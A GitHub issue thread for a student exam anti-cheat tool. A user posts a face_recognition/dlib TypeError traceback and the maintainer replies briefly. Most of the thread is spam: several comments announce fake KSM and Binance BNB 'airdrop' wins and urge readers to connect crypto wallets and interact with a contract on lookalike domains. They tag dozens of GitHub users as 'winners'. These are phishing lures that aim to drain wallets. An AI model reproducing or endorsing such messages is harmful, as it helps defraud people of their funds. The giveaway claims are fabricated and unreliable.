### ISSUE TITLE
help with the error

### ISSUE THREAD

**Issue by Ramki84** [Zorrat/Student-Online-Exam-AntiCheat-Tool#2]
python webCamDemo.py --name "Vamshi N" --phone true --verbose
Loading.....
WARNING:tensorflow:No training configuration found in the save file, so the model was *not* compiled. Compile it manually.
34
Completed
Faces Found in Faces Directory
Vamshi N
Press (q) To abort
1/1 [==============================] - 2s 2s/step
Processing Frame number: 1
Number of frames where phone was detected: 0
Number of Frames where Student was missing: 1
-------------------------------------------------------------
Traceback (most recent call last):
  File "C:\Users\ramad\Downloads\Student-Online-Exam-AntiCheat-Tool-master\webCamDemo.py", line 69, in <module>
    img,absentFramesTotal = aUtils.faceRecInference(faceEncodingsKnown,faceNames,img,absentFramesTotal,nameToCheck)
  File "C:\Users\ramad\Downloads\Student-Online-Exam-AntiCheat-Tool-master\antiCheatUtils.py", line 285, in faceRecInference
    faceEncsCurr = faceRec.face_encodings(frameS, faceLocsCurr)
  File "C:\Users\ramad\AppData\Local\Programs\Python\Python39\lib\site-packages\face_recognition\api.py", line 214, in face_encodings
    return [np.array(face_encoder.compute_face_descriptor(face_image, raw_landmark_set, num_jitters)) for raw_landmark_set in raw_landmarks]
  File "C:\Users\ramad\AppData\Local\Programs\Python\Python39\lib\site-packages\face_recognition\api.py", line 214, in <listcomp>
    return [np.array(face_encoder.compute_face_descriptor(face_image, raw_landmark_set, num_jitters)) for raw_landmark_set in raw_landmarks]
TypeError: compute_face_descriptor(): incompatible function arguments. The following argument types are supported:
    1. (self: _dlib_pybind11.face_recognition_model_v1, img: numpy.ndarray[(rows,cols,3),numpy.uint8], face: _dlib_pybind11.full_object_detection, num_jitters: int = 0, padding: float = 0.25) -> _dlib_pybind11.vector
    2. (self: _dlib_pybind11.face_recognition_model_v1, img: numpy.ndarray[(rows,cols,3),numpy.uint8], num_jitters: int = 0) -> _dlib_pybind11.vector
    3. (self: _dlib_pybind11.face_recognition_model_v1, img: numpy.ndarray[(rows,cols,3),numpy.uint8], faces: _dlib_pybind11.full_object_detections, num_jitters: int = 0, padding: float = 0.25) -> _dlib_pybind11.vectors
    4. (self: _dlib_pybind11.face_recognition_model_v1, batch_img: List[numpy.ndarray[(rows,cols,3),numpy.uint8]], batch_faces: List[_dlib_pybind11.full_object_detections], num_jitters: int = 0, padding: float = 0.25) -> _dlib_pybind11.vectorss
    5. (self: _dlib_pybind11.face_recognition_model_v1, batch_img: List[numpy.ndarray[(rows,cols,3),numpy.uint8]], num_jitters: int = 0) -> _dlib_pybind11.vectors

Invoked with: <_dlib_pybind11.face_recognition_model_v1 object at 0x000001CDB9E05AF0>, array([[[255, 255, 255],
        [255, 255, 255],
        [255, 255, 255],
        ...,
        [241, 241, 241],
        [243, 243, 243],
        [243, 243, 244]],

       [[255, 255, 255],
        [255, 255, 255],
        [255, 255, 255],
        ...,
        [241, 241, 241],
        [242, 242, 243],
        [243, 243, 244]],

       [[255, 255, 255],
        [255, 255, 255],
        [255, 255, 255],
        ...,
        [240, 240, 240],
        [241, 241, 241],
        [240, 240, 240]],

       ...,

       [[227, 227, 220],
        [226, 227, 222],
        [226, 227, 222],
        ...,
        [ 29,  29,  29],
        [ 31,  29,  29],
        [ 38,  28,  30]],

       [[224, 225, 219],
        [226, 226, 222],
        [229, 230, 225],
        ...,
        [ 28,  28,  28],
        [ 27,  28,  28],
        [ 24,  29,  28]],

       [[224, 224, 216],
        [224, 226, 220],
        [222, 227, 222],
        ...,
        [ 30,  30,  30],
        [ 30,  30,  30],
        [ 29,  29,  29]]], dtype=uint8), <_dlib_pybind11.full_object_detection object at 0x000001CDC8D668F0>, 1
PS C:\Users\ramad\Downloads\Student-Online-Exam-AntiCheat-Tool-master>

**Comment by Zorrat** [comment]
Place the model file in correct folder i.e. models/yolo/yolov4.h5 https://drive.google.com/file/d/1RCD4x8rudipNBahxO6Tsk4VsmhbxrmBL/view?usp=sharing

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by shafwansyah** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @panwenqi, @sprakashgithubuk, @alnicky, @CRY-D, @Revolutionist0, @iUmarov, @Erarnitox, @taw420, @tux-00, @srinivasakumar-a, @JayMac87, @erenersahin, @shrasool, @oguidomingos, @rashimak, @frits8l, @stabrizii, @zhiyue, @ivanliono, @magilliam27, @Sinever, @rongzhou, @rezaarshad, @Fatflower, @positioner, @kyleinprogress, @Zeykit, @katjpg, @verystochastic, @smartvnm, @NonameASecret, @brianmcaudill, @hashtagex, @codinglong, @samsonq, @prasanthkuna, @Burton-David, @nfsc-tommy, @RednibCoding, @trevismd, @5m477, @DrrMrr, @jhonathascesar232, @sujit25, @harshdabhi, @mdheller, @koradiyakaushal, @whyhongyi, @wangjin511, @j-wbrown

**Comment by shafwansyah** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by shafwansyah** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by anooj1483** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @zambrose, @FranceSheep, @DanielSinclair, @desmonty, @talentlessguy, @0xVaibhav, @gabrielfior
